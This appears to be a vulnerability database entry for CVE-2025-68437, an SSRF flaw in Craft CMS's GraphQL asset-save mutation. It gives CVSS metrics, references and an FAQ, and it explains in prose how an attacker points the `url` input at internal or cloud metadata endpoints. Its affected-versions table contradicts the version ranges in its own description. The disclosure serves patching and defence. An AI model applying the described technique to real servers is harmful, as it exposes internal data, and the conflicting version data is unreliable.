CVE-2025-68437 — MEDIUM (6.8)

Vulnerability Description

Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, the Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the `_file` input, specifically its `url` parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the `url`, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. This exploitation requires specific GraphQL permissions for asset management within the targeted volume. Users should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue.

CVSS Score

6.8

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

CHANGED

Confidentiality

HIGH

Integrity

NONE

Availability

NONE

Affected Products

Vendor	Product	Versions
Craftcms	Craft Cms	>= 3.5.0, < 4.16.17

Related Weaknesses (CWE)

CWE-918

References

https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04ProductRelease Notes
https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52Patch
https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfccExploitVendor Advisory
https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfccExploitVendor Advisory

FAQ

What is CVE-2025-68437?

CVE-2025-68437 is a vulnerability with a CVSS score of 6.8 (MEDIUM). Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16, the Craft CMS GraphQL `save_<VolumeName>_Asset` mutation is vulnerable to Serv...

How severe is CVE-2025-68437?

CVE-2025-68437 has been rated MEDIUM with a CVSS base score of 6.8/10. Review the CVSS metrics above for detailed severity breakdown.

Is there a patch for CVE-2025-68437?

Check the references section above for vendor advisories and patch information. Affected products include: Craftcms Craft Cms.